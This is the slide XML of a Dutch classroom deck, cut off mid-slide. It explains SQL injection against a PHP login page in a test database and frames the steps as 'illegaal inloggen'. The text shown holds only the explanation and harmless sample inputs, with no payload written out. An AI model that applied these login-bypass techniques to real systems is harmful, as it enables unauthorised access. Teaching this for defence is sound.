          <a:xfrm>
            <a:off x="5918479" y="2418436"/>
            <a:ext cx="2250832" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LOGINCONTROLE.PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6"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135" y="5746835"/>
            <a:ext cx="858918" cy="858918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Tekstvak 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393106" y="2425531"/>
            <a:ext cx="2250832" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LOGIN.PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Tekstvak 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9633572" y="2358687"/>
            <a:ext cx="2250832" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MAINPAGE.PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 2" descr="Gerelateerde afbeel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88480" y="3113917"/>
            <a:ext cx="1383745" cy="126126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Rechte verbindingslijn met pijl 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1572227" y="3779724"/>
            <a:ext cx="1221215"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kstvak 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2793442" y="3333932"/>
            <a:ext cx="1347145" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>invoeren van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Rechte verbindingslijn met pijl 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4140588" y="3788767"/>
            <a:ext cx="2360696"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Tekstvak 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512413" y="3333932"/>
            <a:ext cx="1347145" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>controle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Rechte verbindingslijn met pijl 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7859559" y="3768770"/>
            <a:ext cx="2651017" cy="3119"/>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Rechte verbindingslijn met pijl 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3467014" y="2944167"/>
            <a:ext cx="1" cy="389765"/>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Rechte verbindingslijn met pijl 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7076047" y="2944167"/>
            <a:ext cx="1" cy="389765"/>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Rechte verbindingslijn met pijl 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3463590" y="2944167"/>
            <a:ext cx="3612458" cy="0"/>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kstvak 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7130618" y="2894331"/>
            <a:ext cx="609792" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>nee</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Tekstvak 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7986753" y="3367250"/>
            <a:ext cx="609792" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>ja</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Tekstvak 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117468" y="5507085"/>
            <a:ext cx="4383816" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit is in grote lijnen het inlog mechanisme. Bij verkeerde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> worden gebruikers steeds terug verwezen naar de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login pagina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114431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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>testomgeving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>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002010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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> files bekijken.</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testomgeving opzetten/bekijken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25" name="Afbeelding 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247911" y="1747269"/>
            <a:ext cx="5053252" cy="1401538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Afbeelding 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642202" y="1747269"/>
            <a:ext cx="4689724" cy="1727793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Afbeelding 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126575" y="3366947"/>
            <a:ext cx="7991737" cy="3487057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Rechte verbindingslijn met pijl 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5385916" y="1872082"/>
            <a:ext cx="1326383"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flipV="1">
            <a:off x="7154426" y="2667577"/>
            <a:ext cx="1153546" cy="628282"/>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Tekstvak 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247911" y="3827439"/>
            <a:ext cx="3711140" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Boven : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOGIN.PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Rechts: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOGINCONTROLE.PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: een hacker heeft deze informatie natuurlijk nooit. Echter kan hij zich, op basis van veel proberen, studeren en ervaring, er een voorstelling van maken.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18268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dirty="0" smtClean="0"/>
              <a:t>testomgeving opzetten/bekijken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>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3395941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"Illegaal inloggen"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smtClean="0"/>
              <a:t>: Illegaal inloggen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Stap 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Begrijp het mechanisme</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solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145512" y="4365543"/>
            <a:ext cx="9656466" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De informatie die een gebruiker in de invoervelden op de pagina ingeeft, wordt op deze plekken ingevoegd.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Ergens in de code zal het resultaat van de query terug komen van uit de Database. De kans is groot dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>-code vervolgens controleert of er resultaat is. Indien ja...dan zijn de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> juist. (op zich niets mis mee, lijkt het)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Afbeelding 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010516" y="2616162"/>
            <a:ext cx="9944650" cy="1277197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rechthoek 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716919" y="3404260"/>
            <a:ext cx="829393" cy="361740"/>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9394126" y="3404260"/>
            <a:ext cx="1156644" cy="361740"/>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19" name="Rechte verbindingslijn met pijl 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7191006" y="3766000"/>
            <a:ext cx="0" cy="566769"/>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Rechte verbindingslijn met pijl 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9835398" y="3766000"/>
            <a:ext cx="0" cy="566769"/>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12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"Illegaal inloggen"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smtClean="0"/>
              <a:t>: Illegaal inloggen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Stap 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Een voorbeeld om het helemaal te begrijpen</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solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2982220" y="4742852"/>
            <a:ext cx="6212021" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Je kunt in de database kijken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>SQL Server Management Console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> in de database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>, tabel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gebruikers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> om te zien welke gebruikers er zijn.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Afbeelding 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010516" y="2616162"/>
            <a:ext cx="9944650" cy="1277197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rechthoek 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716919" y="3404259"/>
            <a:ext cx="829393" cy="430727"/>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9314822" y="3404260"/>
            <a:ext cx="1306286" cy="430726"/>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19" name="Rechte verbindingslijn met pijl 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3788229" y="2839155"/>
            <a:ext cx="67900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Rechte verbindingslijn met pijl 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750208" y="3250466"/>
            <a:ext cx="692670"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Tekstvak 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480899" y="2616162"/>
            <a:ext cx="3003884" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>"kees" wordt ingevoerd</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Tekstvak 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5473082" y="3019389"/>
            <a:ext cx="3003884" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>abcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>" wordt ingevoerd</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Tekstvak 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750400" y="3412207"/>
            <a:ext cx="762430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>kees</a:t>
            </a:r>
